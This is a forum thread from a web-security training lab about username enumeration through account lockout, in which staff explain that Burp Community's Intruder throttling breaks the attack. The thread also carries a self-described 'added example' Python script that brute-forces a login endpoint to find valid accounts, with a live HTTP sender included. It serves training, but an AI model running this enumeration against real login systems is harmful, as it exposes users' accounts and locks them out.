IT DOESN'T WORK - Lab: Username enumeration via account lock

Dario | Last updated: Feb 23, 2023 07:57AM UTC

I have tried replicating the attack multiple times in multiple ways, looking at both the solution and other walkthroughs found on the net, but it does not work. I take the POST and send it to Intruder; in Positions I put username=§test§&password=qwerty§§ and choose Cluster bomb. In payload set 1 I put the usernames; in payload set 2 I put null payloads, set to 5. In Settings I put Grep - Extract with "Invalid username or password". I launch the attack. At the end I have all statuses at 200, all lengths at 3005 and all warnings with "invalid username". I can't tell if I'm doing something wrong, but I feel like I copied everything perfectly. Translated with www.DeepL.com/Translator (free version)

Ben, PortSwigger Agent | Last updated: Feb 23, 2023 08:17AM UTC

Hi Dario, Are you using Burp Professional or Burp Community edition for this lab?

Dario | Last updated: Feb 23, 2023 02:41PM UTC

Hi! Burp Community Edition

Ben, PortSwigger Agent | Last updated: Feb 24, 2023 07:48AM UTC

Hi Dario, The Intruder tool is throttled within the Community edition of Burp, which does impact some of the brute-force type labs. For this particular lab (and some of the others that use Intruder) you would need to break up your attack into smaller subsets to get round this throttling, i.e. rather than performing a single, large attack that has all of the usernames configured, perform several smaller attacks that each contain a subset of the supplied usernames.
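
The attack Dario describes (Cluster bomb: username list × 5 null payloads, then look for the one response that no longer contains "Invalid username or password") and Ben's work-around (the same attack run as several smaller batches) can both be expressed outside Burp. The script below is an added example, not PortSwigger's code or part of the lab solution. `FakeTarget` is a constructed stand-in for the lab's login endpoint: the lock threshold, the lock message text and the form field names `username`/`password` used by `http_sender` are assumptions, and only the generic "Invalid username or password." string is taken from the thread.

```python
"""Username enumeration via account lock, run in batches with a pluggable sender.

Added example; not code from the PortSwigger lab or forum. The simulated target,
its lock threshold and its lock message are assumptions made for illustration.
"""
from collections import defaultdict
from typing import Callable, Dict, Iterable, Iterator, List

# Quoted in the thread as the Grep - Extract string used in the lab.
INVALID_MSG = "Invalid username or password."
# Assumed wording for the lock response; the real lab text may differ.
LOCK_MSG = "You have made too many incorrect login attempts."

Sender = Callable[[str, str], str]  # (username, password) -> response body


class FakeTarget:
    """Constructed simulation of the lab: a valid account locks after `threshold`
    failed logins; unknown usernames always get the generic error and never lock."""

    def __init__(self, valid_users: Iterable[str], threshold: int = 3) -> None:
        self.valid = set(valid_users)
        self.threshold = threshold
        self.failures: Dict[str, int] = defaultdict(int)

    def login(self, username: str, password: str) -> str:
        if username not in self.valid:
            return INVALID_MSG
        self.failures[username] += 1
        if self.failures[username] >= self.threshold:
            return LOCK_MSG
        return INVALID_MSG


def http_sender(url: str) -> Sender:
    """Real sender for a live lab (not exercised offline). Assumes form fields
    named `username` and `password`; reads the body even on non-2xx statuses."""
    import urllib.error
    import urllib.parse
    import urllib.request

    def send(username: str, password: str) -> str:
        data = urllib.parse.urlencode(
            {"username": username, "password": password}
        ).encode()
        try:
            with urllib.request.urlopen(url, data=data, timeout=10) as resp:
                return resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:
            return err.read().decode("utf-8", "replace")

    return send


def enumerate_batch(send: Sender, usernames: Iterable[str],
                    attempts: int = 5, password: str = "qwerty") -> List[str]:
    """Cluster-bomb equivalent: each username is tried `attempts` times with the
    same wrong password. A username is a hit if any of its responses lacks the
    generic error (which is what the Grep - Extract column reveals in Intruder)."""
    hits = []
    for user in usernames:
        bodies = [send(user, password) for _ in range(attempts)]
        if any(INVALID_MSG not in body for body in bodies):
            hits.append(user)
    return hits


def chunked(items: Iterable[str], size: int) -> Iterator[List[str]]:
    """Split a username list into consecutive sub-lists of at most `size`."""
    buf = list(items)
    for i in range(0, len(buf), size):
        yield buf[i:i + size]


def enumerate_in_batches(send: Sender, usernames: Iterable[str],
                         batch_size: int = 20, attempts: int = 5) -> List[str]:
    """Ben's work-around: run the same attack as several small batches instead of
    one large one. The lock state lives on the server, so the result is identical;
    only how the requests are scheduled changes."""
    found: List[str] = []
    for batch in chunked(usernames, batch_size):
        found.extend(enumerate_batch(send, batch, attempts=attempts))
    return found


if __name__ == "__main__":
    # Constructed wordlist and target; "carlos" is the only account that exists.
    target = FakeTarget(["carlos"], threshold=3)
    wordlist = ["admin", "root", "carlos", "guest", "test"]
    print(enumerate_in_batches(target.login, wordlist, batch_size=2))
```

Against a live lab you would replace `target.login` with `http_sender("https://<lab-host>/login")` and feed the full username list; the `attempts` value must be at least the server's lock threshold or no response will ever differ, which is the same failure mode as an attack cut short by throttling.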

Dario | Last updated: Feb 24, 2023 01:27PM UTC

OK, I'll try as you said, thanks a lot.

Marcel | Last updated: Apr 07, 2023 04:27AM UTC

Could a warning be added to the labs that have this issue with the community edition? It's very frustrating to debug why the lab isn't working even though you're following the exact steps. Thanks, Marcel

Ben, PortSwigger Agent | Last updated: Apr 07, 2023 07:43AM UTC

Hi Marcel, We can certainly discuss this with the Web Academy team to see if it is something that we can add (we have already raised a request to label labs that absolutely require the use of Burp Professional).
